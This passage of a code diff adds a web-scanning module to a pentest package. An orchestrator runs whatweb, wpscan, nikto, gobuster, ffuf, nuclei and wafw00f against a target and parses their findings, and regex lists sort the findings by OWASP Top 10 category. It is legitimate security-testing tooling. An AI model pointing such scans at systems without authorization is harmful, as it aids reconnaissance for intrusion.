+      scanID: z.string(),
+      tool: z.string(),
+      target: z.string(),
+    })
+  )
+
+  /**
+   * Tool execution completed.
+   */
+  export const ToolCompleted = BusEvent.define(
+    "pentest.webscan.tool_completed",
+    z.object({
+      scanID: z.string(),
+      tool: z.string(),
+      duration: z.number(),
+      findingsCount: z.number(),
+    })
+  )
+
+  /**
+   * Tool execution failed.
+   */
+  export const ToolFailed = BusEvent.define(
+    "pentest.webscan.tool_failed",
+    z.object({
+      scanID: z.string(),
+      tool: z.string(),
+      error: z.string(),
+    })
+  )
+
+  /**
+   * Scan completed.
+   */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.webscan.scan_completed",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: z.string(),
+      toolsRun: z.number(),
+      toolsFailed: z.number(),
+      findingsCount: z.number(),
+      duration: z.number(),
+      status: z.enum(["completed", "failed", "stopped"]),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/webscan/index.ts b/packages/opencode/src/pentest/webscan/index.ts
new file mode 100644
index 00000000000..84e01aec2bf
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/index.ts
@@ -0,0 +1,33 @@
+/**
+ * @fileoverview Web Application Scanner
+ *
+ * Provides web crawling, security scanning, and OWASP categorization
+ * for the cyxwiz pentest module.
+ *
+ * Features:
+ * - Web crawling with link/form extraction
+ * - Scan orchestration with profiles
+ * - OWASP Top 10 2021 categorization
+ * - WPScan and WhatWeb parsers
+ *
+ * @module pentest/webscan
+ */
+
+// Types
+export { WebScanTypes } from "./types"
+
+// Events
+export { WebScanEvents } from "./events"
+
+// Core functionality
+export { WebCrawler } from "./crawler"
+export { ScanOrchestrator } from "./orchestrator"
+export { ScanProfiles } from "./profiles"
+export { WebScanStorage, type StorageConfig } from "./storage"
+export { OwaspCategorization } from "./owasp"
+
+// Tool
+export { WebScanTool } from "./tool"
+
+// Parsers
+export { WPScanParser, WhatWebParser } from "./parsers"
diff --git a/packages/opencode/src/pentest/webscan/orchestrator.ts b/packages/opencode/src/pentest/webscan/orchestrator.ts
new file mode 100644
index 00000000000..be6b3417ed0
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/orchestrator.ts
@@ -0,0 +1,716 @@
+/**
+ * @fileoverview Web Scan Orchestrator
+ *
+ * Coordinates web crawling and security tool execution based on profiles.
+ *
+ * @module pentest/webscan/orchestrator
+ */
+
+import { spawn } from "child_process"
+import { WebScanTypes } from "./types"
+import { WebScanEvents } from "./events"
+import { WebCrawler } from "./crawler"
+import { ScanProfiles } from "./profiles"
+import { WebScanStorage } from "./storage"
+import { WPScanParser, WhatWebParser } from "./parsers"
+import { Findings } from "../findings"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+import { Instance } from "../../project/instance"
+import { PentestTypes } from "../types"
+
+const log = Log.create({ service: "webscan.orchestrator" })
+
+const DEFAULT_TOOL_TIMEOUT = 5 * 60 * 1000 // 5 minutes
+
+/**
+ * Tool execution context.
+ */
+interface ToolContext {
+  scanID: string
+  target: string
+  sessionID: string
+  crawlResult?: WebScanTypes.CrawlResult
+}
+
+/**
+ * Tool execution result.
+ */
+interface ToolResult {
+  tool: string
+  output: string
+  findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">>
+  duration: number
+  error?: string
+}
+
+/**
+ * Web scan orchestrator namespace.
+ */
+export namespace ScanOrchestrator {
+  /**
+   * Run a scan with the specified profile.
+   *
+   * @param target - Target URL
+   * @param profile - Scan profile or profile ID
+   * @param options - Scan options
+   * @returns Scan result
+   */
+  export async function scan(
+    target: string,
+    profile: WebScanTypes.ScanProfile | WebScanTypes.ProfileId,
+    options: {
+      sessionID: string
+      timeout?: number
+      signal?: AbortSignal
+      customCrawl?: Partial<WebScanTypes.CrawlOptions>
+      customTools?: string[]
+    }
+  ): Promise<WebScanTypes.ScanResult> {
+    // Resolve profile
+    const resolvedProfile = typeof profile === "string" ? ScanProfiles.get(profile) : profile
+
+    const scanID = `scan_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+    const startedAt = Date.now()
+
+    log.info("scan started", { scanID, target, profile: resolvedProfile.id })
+
+    // Determine tools to run
+    const tools = options.customTools || resolvedProfile.tools
+
+    Bus.publish(WebScanEvents.ScanStarted, {
+      scanID,
+      target,
+      profile: resolvedProfile.id,
+      tools,
+    })
+
+    // Initialize result
+    const result: WebScanTypes.ScanResult = {
+      id: scanID,
+      target,
+      profile: resolvedProfile.id,
+      tools: tools.map((tool) => ({
+        tool,
+        status: "pending" as const,
+      })),
+      findings: [],
+      stats: {
+        urlsScanned: 0,
+        toolsRun: 0,
+        toolsFailed: 0,
+        findingsCount: 0,
+        criticalCount: 0,
+        highCount: 0,
+        mediumCount: 0,
+        lowCount: 0,
+        infoCount: 0,
+        duration: 0,
+      },
+      startedAt,
+      status: "running",
+    }
+
+    let crawlResult: WebScanTypes.CrawlResult | undefined
+
+    try {
+      // Run crawl if enabled
+      if (resolvedProfile.crawl.enabled) {
+        const crawlOptions: Partial<WebScanTypes.CrawlOptions> = {
+          maxDepth: resolvedProfile.crawl.maxDepth,
+          maxUrls: resolvedProfile.crawl.maxUrls,
+          ...options.customCrawl,
+        }
+
+        crawlResult = await WebCrawler.crawl(target, crawlOptions, options.signal)
+        result.crawlID = crawlResult.id
+        result.stats.urlsScanned = crawlResult.urls.length
+
+        // Save crawl result
+        await WebScanStorage.saveCrawl(crawlResult)
+      }
+
+      // Create tool context
+      const ctx: ToolContext = {
+        scanID,
+        target,
+        sessionID: options.sessionID,
+        crawlResult,
+      }
+
+      // Run tools
+      const allFindings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+      for (let i = 0; i < tools.length; i++) {
+        const tool = tools[i]
+
+        // Check abort signal
+        if (options.signal?.aborted) {
+          result.tools[i].status = "skipped"
+          continue
+        }
+
+        // Update status
+        result.tools[i].status = "running"
+        result.tools[i].startedAt = Date.now()
+
+        Bus.publish(WebScanEvents.ToolStarted, {
+          scanID,
+          tool,
+          target,
+        })
+
+        try {
+          const toolResult = await runTool(tool, ctx, resolvedProfile.toolOptions?.[tool], options.timeout)
+
+          result.tools[i].status = "completed"
+          result.tools[i].completedAt = Date.now()
+          result.tools[i].duration = toolResult.duration
+          result.tools[i].findingsCount = toolResult.findings.length
+          result.tools[i].output = toolResult.output
+
+          allFindings.push(...toolResult.findings)
+          result.stats.toolsRun++
+
+          Bus.publish(WebScanEvents.ToolCompleted, {
+            scanID,
+            tool,
+            duration: toolResult.duration,
+            findingsCount: toolResult.findings.length,
+          })
+        } catch (error) {
+          const errorMsg = error instanceof Error ? error.message : String(error)
+          result.tools[i].status = "failed"
+          result.tools[i].completedAt = Date.now()
+          result.tools[i].error = errorMsg
+          result.stats.toolsFailed++
+
+          log.error("tool execution failed", { scanID, tool, error: errorMsg })
+
+          Bus.publish(WebScanEvents.ToolFailed, {
+            scanID,
+            tool,
+            error: errorMsg,
+          })
+        }
+      }
+
+      // Save findings
+      for (const findingData of allFindings) {
+        const finding = await Findings.create(
+          {
+            ...findingData,
+            scanID,
+          },
+          { storage: "file" }
+        )
+        result.findings.push(finding.id)
+
+        // Update severity counts
+        switch (finding.severity) {
+          case "critical":
+            result.stats.criticalCount++
+            break
+          case "high":
+            result.stats.highCount++
+            break
+          case "medium":
+            result.stats.mediumCount++
+            break
+          case "low":
+            result.stats.lowCount++
+            break
+          case "info":
+            result.stats.infoCount++
+            break
+        }
+      }
+
+      result.stats.findingsCount = result.findings.length
+      result.status = "completed"
+    } catch (error) {
+      result.status = "failed"
+      result.error = error instanceof Error ? error.message : String(error)
+      log.error("scan failed", { scanID, error: result.error })
+    }
+
+    result.completedAt = Date.now()
+    result.stats.duration = result.completedAt - startedAt
+
+    // Save scan result
+    await WebScanStorage.saveScan(result)
+
+    Bus.publish(WebScanEvents.ScanCompleted, {
+      scanID,
+      target,
+      profile: resolvedProfile.id,
+      toolsRun: result.stats.toolsRun,
+      toolsFailed: result.stats.toolsFailed,
+      findingsCount: result.stats.findingsCount,
+      duration: result.stats.duration,
+      status: result.status,
+    })
+
+    log.info("scan completed", {
+      scanID,
+      findingsCount: result.stats.findingsCount,
+      duration: result.stats.duration,
+    })
+
+    return result
+  }
+
+  /**
+   * Run a single tool.
+   */
+  async function runTool(
+    tool: string,
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+
+    switch (tool) {
+      case "whatweb":
+        return runWhatWeb(ctx, options, timeout)
+      case "wpscan":
+        return runWPScan(ctx, options, timeout)
+      case "nikto":
+        return runNikto(ctx, options, timeout)
+      case "gobuster":
+        return runGobuster(ctx, options, timeout)
+      case "ffuf":
+        return runFfuf(ctx, options, timeout)
+      case "nuclei":
+        return runNuclei(ctx, options, timeout)
+      case "wafw00f":
+        return runWafw00f(ctx, options, timeout)
+      default:
+        throw new Error(`Unknown tool: ${tool}`)
+    }
+  }
+
+  /**
+   * Run WhatWeb.
+   */
+  async function runWhatWeb(
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+    const args = ["-a", "3", "--log-json=-", ctx.target, ...(options || [])]
+
+    const output = await runCommand("whatweb", args, timeout || DEFAULT_TOOL_TIMEOUT)
+    const results = WhatWebParser.parse(output)
+
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+    for (const result of results) {
+      findings.push(...WhatWebParser.toFindings(result, ctx.target, ctx.sessionID, ctx.scanID))
+    }
+
+    return {
+      tool: "whatweb",
+      output,
+      findings,
+      duration: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Run WPScan.
+   */
+  async function runWPScan(
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+    const args = ["--url", ctx.target, "--format", "json", "--no-banner", ...(options || [])]
+
+    const output = await runCommand("wpscan", args, timeout || DEFAULT_TOOL_TIMEOUT * 2)
+    const result = WPScanParser.parse(output)
+    const findings = WPScanParser.toFindings(result, ctx.target, ctx.sessionID, ctx.scanID)
+
+    return {
+      tool: "wpscan",
+      output,
+      findings,
+      duration: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Run Nikto.
+   */
+  async function runNikto(
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+    const args = ["-h", ctx.target, "-Format", "json", ...(options || [])]
+
+    const output = await runCommand("nikto", args, timeout || DEFAULT_TOOL_TIMEOUT * 3)
+
+    // Parse nikto JSON output
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+    try {
+      const data = JSON.parse(output)
+      const vulnerabilities = data.vulnerabilities || []
+
+      for (const vuln of vulnerabilities) {
+        findings.push({
+          sessionID: ctx.sessionID,
+          scanID: ctx.scanID,
+          title: vuln.msg || "Nikto Finding",
+          description: vuln.msg || "",
+          severity: mapNiktoSeverity(vuln.OSVDB),
+          status: "open",
+          target: ctx.target,
+          service: "http",
+          evidence: `ID: ${vuln.id || "N/A"}, Method: ${vuln.method || "GET"}`,
+          references: vuln.OSVDB ? [`https://www.osvdb.org/${vuln.OSVDB}`] : undefined,
+        })
+      }
+    } catch {
+      // Fall back to text parsing if JSON fails
+      log.warn("Failed to parse nikto JSON, output may be incomplete")
+    }
+
+    return {
+      tool: "nikto",
+      output,
+      findings,
+      duration: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Run Gobuster.
+   */
+  async function runGobuster(
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+    const defaultWordlist = "/usr/share/wordlists/dirb/common.txt"
+    const args = ["dir", "-u", ctx.target, "-q", ...(options || ["-w", defaultWordlist])]
+
+    const output = await runCommand("gobuster", args, timeout || DEFAULT_TOOL_TIMEOUT * 2)
+
+    // Parse gobuster output
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const match = line.match(/^(\S+)\s+$Status:\s+(\d+)$/)
+      if (match) {
+        const [, path, status] = match
+        const statusCode = parseInt(status, 10)
+
+        // Only report interesting findings
+        if (statusCode >= 200 && statusCode < 400 && path.match(/\.(bak|old|conf|config|sql|db|log|txt)$/i)) {
+          findings.push({
+            sessionID: ctx.sessionID,
+            scanID: ctx.scanID,
+            title: `Sensitive File Found: ${path}`,
+            description: `Directory enumeration found a potentially sensitive file at ${path}`,
+            severity: "medium",
+            status: "open",
+            target: ctx.target,
+            service: "http",
+            evidence: `Path: ${path}, Status: ${statusCode}`,
+            remediation: "Remove or restrict access to sensitive files",
+          })
+        }
+      }
+    }
+
+    return {
+      tool: "gobuster",
+      output,
+      findings,
+      duration: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Run ffuf.
+   */
+  async function runFfuf(
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+    const defaultWordlist = "/usr/share/wordlists/dirb/common.txt"
+    const args = ["-u", `${ctx.target}/FUZZ`, "-o", "-", "-of", "json", ...(options || ["-w", defaultWordlist])]
+
+    const output = await runCommand("ffuf", args, timeout || DEFAULT_TOOL_TIMEOUT * 2)
+
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+    try {
+      const data = JSON.parse(output)
+      const results = data.results || []
+
+      for (const result of results) {
+        if (result.input && result.status >= 200 && result.status < 400) {
+          const path = result.input.FUZZ || result.input
+
+          if (typeof path === "string" && path.match(/\.(bak|old|conf|config|sql|db|log|txt)$/i)) {
+            findings.push({
+              sessionID: ctx.sessionID,
+              scanID: ctx.scanID,
+              title: `Sensitive File Found: ${path}`,
+              description: `Fuzzing found a potentially sensitive file at ${path}`,
+              severity: "medium",
+              status: "open",
+              target: ctx.target,
+              service: "http",
+              evidence: `Path: ${path}, Status: ${result.status}, Size: ${result.length}`,
+              remediation: "Remove or restrict access to sensitive files",
+            })
+          }
+        }
+      }
+    } catch {
+      log.warn("Failed to parse ffuf JSON output")
+    }
+
+    return {
+      tool: "ffuf",
+      output,
+      findings,
+      duration: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Run Nuclei.
+   */
+  async function runNuclei(
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+    const args = ["-u", ctx.target, "-jsonl", ...(options || ["-severity", "medium,high,critical"])]
+
+    const output = await runCommand("nuclei", args, timeout || DEFAULT_TOOL_TIMEOUT * 3)
+
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+    const lines = output.split("\n").filter((l) => l.trim())
+
+    for (const line of lines) {
+      try {
+        const data = JSON.parse(line)
+        findings.push({
+          sessionID: ctx.sessionID,
+          scanID: ctx.scanID,
+          title: data.info?.name || data["template-id"] || "Nuclei Finding",
+          description: data.info?.description || "",
+          severity: mapNucleiSeverity(data.info?.severity),
+          status: "open",
+          target: ctx.target,
+          service: data.type || "http",
+          evidence: `Template: ${data["template-id"]}, Matched: ${data.matched || data["matched-at"]}`,
+          references: data.info?.reference,
+          cve: data.info?.classification?.["cve-id"] ? [data.info.classification["cve-id"]] : undefined,
+          remediation: data.info?.remediation,
+        })
+      } catch {
+        // Skip non-JSON lines
+      }
+    }
+
+    return {
+      tool: "nuclei",
+      output,
+      findings,
+      duration: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Run wafw00f.
+   */
+  async function runWafw00f(
+    ctx: ToolContext,
+    options?: string[],
+    timeout?: number
+  ): Promise<ToolResult> {
+    const startTime = Date.now()
+    const args = [ctx.target, "-o", "-", "-f", "json", ...(options || [])]
+
+    const output = await runCommand("wafw00f", args, timeout || DEFAULT_TOOL_TIMEOUT)
+
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+    try {
+      const data = JSON.parse(output)
+      const results = Array.isArray(data) ? data : [data]
+
+      for (const result of results) {
+        if (result.firewall) {
+          findings.push({
+            sessionID: ctx.sessionID,
+            scanID: ctx.scanID,
+            title: `WAF Detected: ${result.firewall}`,
+            description: `A Web Application Firewall (${result.firewall}) was detected on the target`,
+            severity: "info",
+            status: "open",
+            target: ctx.target,
+            service: "waf",
+            evidence: `WAF: ${result.firewall}`,
+          })
+        }
+      }
+    } catch {
+      // Text output fallback
+      if (output.includes("is behind")) {
+        const match = output.match(/is behind\s+(.+)$/m)
+        if (match) {
+          findings.push({
+            sessionID: ctx.sessionID,
+            scanID: ctx.scanID,
+            title: `WAF Detected: ${match[1]}`,
+            description: `A Web Application Firewall (${match[1]}) was detected on the target`,
+            severity: "info",
+            status: "open",
+            target: ctx.target,
+            service: "waf",
+            evidence: `WAF: ${match[1]}`,
+          })
+        }
+      }
+    }
+
+    return {
+      tool: "wafw00f",
+      output,
+      findings,
+      duration: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Map Nikto OSVDB to severity.
+   */
+  function mapNiktoSeverity(osvdb: string | undefined): PentestTypes.Severity {
+    if (!osvdb || osvdb === "0") return "info"
+    return "medium"
+  }
+
+  /**
+   * Map Nuclei severity to pentest severity.
+   */
+  function mapNucleiSeverity(severity: string | undefined): PentestTypes.Severity {
+    switch (severity?.toLowerCase()) {
+      case "critical":
+        return "critical"
+      case "high":
+        return "high"
+      case "medium":
+        return "medium"
+      case "low":
+        return "low"
+      default:
+        return "info"
+    }
+  }
+
+  /**
+   * Run a command and capture output.
+   */
+  async function runCommand(cmd: string, args: string[], timeout: number): Promise<string> {
+    return new Promise((resolve, reject) => {
+      let stdout = ""
+      let stderr = ""
+
+      const proc = spawn(cmd, args, {
+        cwd: Instance.directory,
+        stdio: ["ignore", "pipe", "pipe"],
+      })
+
+      proc.stdout?.on("data", (chunk: Buffer) => {
+        stdout += chunk.toString()
+      })
+
+      proc.stderr?.on("data", (chunk: Buffer) => {
+        stderr += chunk.toString()
+      })
+
+      const timer = setTimeout(() => {
+        proc.kill("SIGTERM")
+        reject(new Error(`Command timed out after ${timeout}ms`))
+      }, timeout)
+
+      proc.once("exit", (code) => {
+        clearTimeout(timer)
+        if (code === 0 || stdout.length > 0) {
+          resolve(stdout)
+        } else {
+          reject(new Error(stderr || `Command ${cmd} failed with code ${code}`))
+        }
+      })
+
+      proc.once("error", (err) => {
+        clearTimeout(timer)
+        reject(err)
+      })
+    })
+  }
+
+  /**
+   * Format scan result for display.
+   */
+  export function format(result: WebScanTypes.ScanResult): string {
+    const lines: string[] = []
+
+    lines.push(`Web Scan Results: ${result.target}`)
+    lines.push("=".repeat(60))
+    lines.push("")
+    lines.push(`Profile: ${result.profile}`)
+    lines.push(`Status: ${result.status}`)
+    lines.push(`Duration: ${(result.stats.duration / 1000).toFixed(1)}s`)
+    lines.push("")
+
+    if (result.crawlID) {
+      lines.push(`Crawl ID: ${result.crawlID}`)
+      lines.push(`URLs scanned: ${result.stats.urlsScanned}`)
+      lines.push("")
+    }
+
+    lines.push("Tools:")
+    for (const tool of result.tools) {
+      const status = tool.status === "completed" ? "✓" : tool.status === "failed" ? "✗" : "○"
+      let line = `  ${status} ${tool.tool}`
+      if (tool.duration) {
+        line += ` (${(tool.duration / 1000).toFixed(1)}s)`
+      }
+      if (tool.findingsCount !== undefined) {
+        line += ` - ${tool.findingsCount} finding(s)`
+      }
+      if (tool.error) {
+        line += ` - Error: ${tool.error}`
+      }
+      lines.push(line)
+    }
+
+    lines.push("")
+    lines.push("Findings Summary:")
+    lines.push(`  Critical: ${result.stats.criticalCount}`)
+    lines.push(`  High: ${result.stats.highCount}`)
+    lines.push(`  Medium: ${result.stats.mediumCount}`)
+    lines.push(`  Low: ${result.stats.lowCount}`)
+    lines.push(`  Info: ${result.stats.infoCount}`)
+    lines.push(`  Total: ${result.stats.findingsCount}`)
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/owasp.ts b/packages/opencode/src/pentest/webscan/owasp.ts
new file mode 100644
index 00000000000..843dd834bb4
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/owasp.ts
@@ -0,0 +1,400 @@
+/**
+ * @fileoverview OWASP Top 10 2021 Categorization
+ *
+ * Categorize findings according to OWASP Top 10 2021 categories
+ * using pattern matching on finding titles and descriptions.
+ *
+ * @module pentest/webscan/owasp
+ */
+
+import { WebScanTypes } from "./types"
+import { PentestTypes } from "../types"
+import { Findings } from "../findings"
+
+/**
+ * OWASP categorization namespace.
+ */
+export namespace OwaspCategorization {
+  /**
+   * Pattern definitions for each OWASP category.
+   */
+  interface CategoryPattern {
+    category: WebScanTypes.OwaspCategory
+    patterns: RegExp[]
+    keywords: string[]
+  }
+
+  const categoryPatterns: CategoryPattern[] = [
+    {
+      category: "A01:2021-Broken_Access_Control",
+      patterns: [
+        /path\s*traversal/i,
+        /directory\s*traversal/i,
+        /idor/i,
+        /insecure\s*direct\s*object/i,
+        /privilege\s*escalation/i,
+        /horizontal\s*access/i,
+        /vertical\s*access/i,
+        /access\s*control/i,
+        /authorization\s*bypass/i,
+        /forced\s*browsing/i,
+        /cors\s*misconfig/i,
+        /cors\s*policy/i,
+        /\.\.\/\.\.\//i,
+        /unprotected\s*admin/i,
+        /missing\s*function\s*level\s*access/i,
+      ],
+      keywords: ["traversal", "idor", "privilege", "cors", "access control", "bypass", "unauthorized"],
+    },
+    {
+      category: "A02:2021-Cryptographic_Failures",
+      patterns: [
+        /ssl\b/i,
+        /tls\b/i,
+        /weak\s*cipher/i,
+        /weak\s*encryption/i,
+        /weak\s*crypto/i,
+        /plaintext/i,
+        /unencrypted/i,
+        /certificate/i,
+        /md5/i,
+        /sha1(?!\d)/i,
+        /des\b/i,
+        /rc4/i,
+        /poodle/i,
+        /beast/i,
+        /heartbleed/i,
+        /logjam/i,
+        /drown/i,
+        /sweet32/i,
+        /https?\s*downgrade/i,
+        /missing\s*hsts/i,
+        /hsts/i,
+        /sensitive\s*data\s*exposure/i,
+      ],
+      keywords: ["ssl", "tls", "cipher", "certificate", "encryption", "crypto", "plaintext", "hsts"],
+    },
+    {
+      category: "A03:2021-Injection",
+      patterns: [
+        /sql\s*injection/i,
+        /sqli\b/i,
+        /xss\b/i,
+        /cross[\s-]*site[\s-]*script/i,
+        /command\s*injection/i,
+        /code\s*injection/i,
+        /ldap\s*injection/i,
+        /xpath\s*injection/i,
+        /xml\s*injection/i,
+        /xxe/i,
+        /xml\s*external\s*entity/i,
+        /template\s*injection/i,
+        /ssti/i,
+        /nosql\s*injection/i,
+        /header\s*injection/i,
+        /crlf\s*injection/i,
+        /os\s*command/i,
+        /shell\s*injection/i,
+        /eval\s*injection/i,
+        /reflection/i,
+      ],
+      keywords: ["injection", "sqli", "xss", "xxe", "ssti", "command", "script"],
+    },
+    {
+      category: "A04:2021-Insecure_Design",
+      patterns: [
+        /business\s*logic/i,
+        /insecure\s*design/i,
+        /missing\s*rate\s*limit/i,
+        /race\s*condition/i,
+        /insufficient\s*anti[\s-]*automation/i,
+        /missing\s*captcha/i,
+        /price\s*manipulation/i,
+        /quantity\s*manipulation/i,
+        /workflow\s*bypass/i,
+        /trust\s*boundary/i,
+        /threat\s*model/i,
+      ],
+      keywords: ["business logic", "design", "rate limit", "race condition", "workflow"],
+    },
+    {
+      category: "A05:2021-Security_Misconfiguration",
+      patterns: [
+        /default\s*credential/i,
+        /default\s*password/i,
+        /admin\s*panel/i,
+        /verbose\s*error/i,
+        /stack\s*trace/i,
+        /debug\s*mode/i,
+        /directory\s*listing/i,
+        /information\s*disclosure/i,
+        /backup\s*file/i,
+        /\.bak\b/i,
+        /\.old\b/i,
+        /\.swp\b/i,
+        /phpinfo/i,
+        /git\s*exposed/i,
+        /\.git\b/i,
+        /\.svn\b/i,
+        /\.env\b/i,
+        /config\s*file/i,
+        /security\s*header/i,
+        /x-frame-options/i,
+        /x-content-type/i,
+        /x-xss-protection/i,
+        /content-security-policy/i,
+        /csp\b/i,
+        /server\s*version/i,
+        /banner\s*grab/i,
+        /unnecessary\s*service/i,
+        /unused\s*feature/i,
+        /permissive\s*policy/i,
+      ],
+      keywords: [
+        "default",
+        "misconfiguration",
+        "disclosure",
+        "header",
+        "debug",
+        "directory listing",
+        "backup",
+        "exposed",
+      ],
+    },
+    {
+      category: "A06:2021-Vulnerable_and_Outdated_Components",
+      patterns: [
+        /cve[\s-]*\d{4}/i,
+        /outdated/i,
+        /vulnerable\s*version/i,
+        /known\s*vulnerabilit/i,
+        /end[\s-]*of[\s-]*life/i,
+        /eol\b/i,
+        /deprecated/i,
+        /unsupported/i,
+        /jquery.*\d+\.\d+/i,
+        /wordpress.*\d+\.\d+/i,
+        /apache.*\d+\.\d+/i,
+        /nginx.*\d+\.\d+/i,
+        /php.*\d+\.\d+/i,
+        /plugin\s*vulnerab/i,
+        /component\s*vulnerab/i,
+        /library\s*vulnerab/i,
+        /framework\s*vulnerab/i,
+      ],
+      keywords: ["cve", "outdated", "vulnerable", "version", "eol", "deprecated", "plugin"],
+    },
+    {
+      category: "A07:2021-Identification_and_Authentication_Failures",
+      patterns: [
+        /weak\s*password/i,
+        /password\s*policy/i,
+        /brute[\s-]*force/i,
+        /credential\s*stuff/i,
+        /session\s*fixation/i,
+        /session\s*hijack/i,
+        /session\s*management/i,
+        /authentication\s*bypass/i,
+        /login\s*bypass/i,
+        /cookie\s*security/i,
+        /httponly/i,
+        /secure\s*flag/i,
+        /samesite/i,
+        /jwt\s*vulnerab/i,
+        /token\s*leak/i,
+        /mfa\s*bypass/i,
+        /2fa\s*bypass/i,
+        /password\s*reset/i,
+        /account\s*enumeration/i,
+        /username\s*enumeration/i,
+        /user\s*enumeration/i,
+      ],
+      keywords: ["password", "session", "authentication", "login", "cookie", "credential", "enumeration", "brute"],
+    },
+    {
+      category: "A08:2021-Software_and_Data_Integrity_Failures",
+      patterns: [
+        /deserializ/i,
+        /insecure\s*unserialize/i,
+        /pickle/i,
+        /yaml\s*load/i,
+        /object\s*injection/i,
+        /ci[\s\/]*cd/i,
+        /pipeline\s*vulnerab/i,
+        /unsigned\s*update/i,
+        /integrity\s*check/i,
+        /cdn\s*poisoning/i,
+        /subresource\s*integrity/i,
+        /sri\b/i,
+        /supply[\s-]*chain/i,
+        /dependency\s*confusion/i,
+        /typosquatting/i,
+      ],
+      keywords: ["deserialize", "integrity", "pipeline", "unsigned", "supply chain"],
+    },
+    {
+      category: "A09:2021-Security_Logging_and_Monitoring_Failures",
+      patterns: [
+        /missing\s*logging/i,
+        /insufficient\s*logging/i,
+        /log\s*injection/i,
+        /log\s*forging/i,
+        /audit\s*log/i,
+        /monitoring\s*failure/i,
+        /no\s*alerting/i,
+        /detection\s*failure/i,
+        /incident\s*response/i,
+      ],
+      keywords: ["logging", "monitoring", "audit", "alerting"],
+    },
+    {
+      category: "A10:2021-Server-Side_Request_Forgery",
+      patterns: [/ssrf/i, /server[\s-]*side\s*request\s*forgery/i, /url\s*fetch/i, /internal\s*service\s*access/i],
+      keywords: ["ssrf", "server-side request", "internal service"],
+    },
+  ]
+
+  /**
+   * Categorize a single finding.
+   */
+  export function categorizeFinding(finding: PentestTypes.Finding): WebScanTypes.CategorizedFinding {
+    const text = `${finding.title} ${finding.description} ${finding.evidence || ""}`.toLowerCase()
+    const matchedPatterns: string[] = []
+    let bestCategory: WebScanTypes.OwaspCategory = "Uncategorized"
+    let bestConfidence: "high" | "medium" | "low" = "low"
+    let maxMatches = 0
+
+    for (const category of categoryPatterns) {
+      let patternMatches = 0
+      const currentMatches: string[] = []
+
+      // Check regex patterns
+      for (const pattern of category.patterns) {
+        if (pattern.test(text)) {
+          patternMatches++
+          currentMatches.push(pattern.source)
+        }
+      }
+
+      // Check keywords
+      for (const keyword of category.keywords) {
+        if (text.includes(keyword.toLowerCase())) {
+          patternMatches += 0.5
+          currentMatches.push(keyword)
+        }
+      }
+
+      if (patternMatches > maxMatches) {
+        maxMatches = patternMatches
+        bestCategory = category.category
+        matchedPatterns.length = 0
+        matchedPatterns.push(...currentMatches)
+      }
+    }
+
+    // Determine confidence based on match count
+    if (maxMatches >= 3) {
+      bestConfidence = "high"
+    } else if (maxMatches >= 1.5) {
+      bestConfidence = "medium"
+    } else if (maxMatches > 0) {
+      bestConfidence = "low"
+    }
+
+    // CVE matching always bumps to A06
+    if (finding.cve && finding.cve.length > 0) {
+      bestCategory = "A06:2021-Vulnerable_and_Outdated_Components"
+      bestConfidence = "high"
+      matchedPatterns.push("cve-present")
+    }
+
+    return {
+      findingID: finding.id,
+      category: bestCategory,
+      confidence: bestConfidence,
+      matchedPatterns,
+    }
+  }
+
+  /**
+   * Categorize findings for a scan.
+   */
+  export async function categorize(scanID: string): Promise<WebScanTypes.OwaspCategorization> {
+    const findings = await Findings.list({}, { scanID })
+    const categorized: WebScanTypes.CategorizedFinding[] = []
+    const summary: Record<WebScanTypes.OwaspCategory, number> = {
+      "A01:2021-Broken_Access_Control": 0,
+      "A02:2021-Cryptographic_Failures": 0,
+      "A03:2021-Injection": 0,
+      "A04:2021-Insecure_Design": 0,
+      "A05:2021-Security_Misconfiguration": 0,
+      "A06:2021-Vulnerable_and_Outdated_Components": 0,
+      "A07:2021-Identification_and_Authentication_Failures": 0,
+      "A08:2021-Software_and_Data_Integrity_Failures": 0,
+      "A09:2021-Security_Logging_and_Monitoring_Failures": 0,
+      "A10:2021-Server-Side_Request_Forgery": 0,
+      Uncategorized: 0,
+    }
+
+    for (const finding of findings) {
+      const result = categorizeFinding(finding)
+      categorized.push(result)
+      summary[result.category]++
+    }
+
+    return {
+      scanID,
+      findings: categorized,
+      summary,
+      generatedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Format categorization result for display.
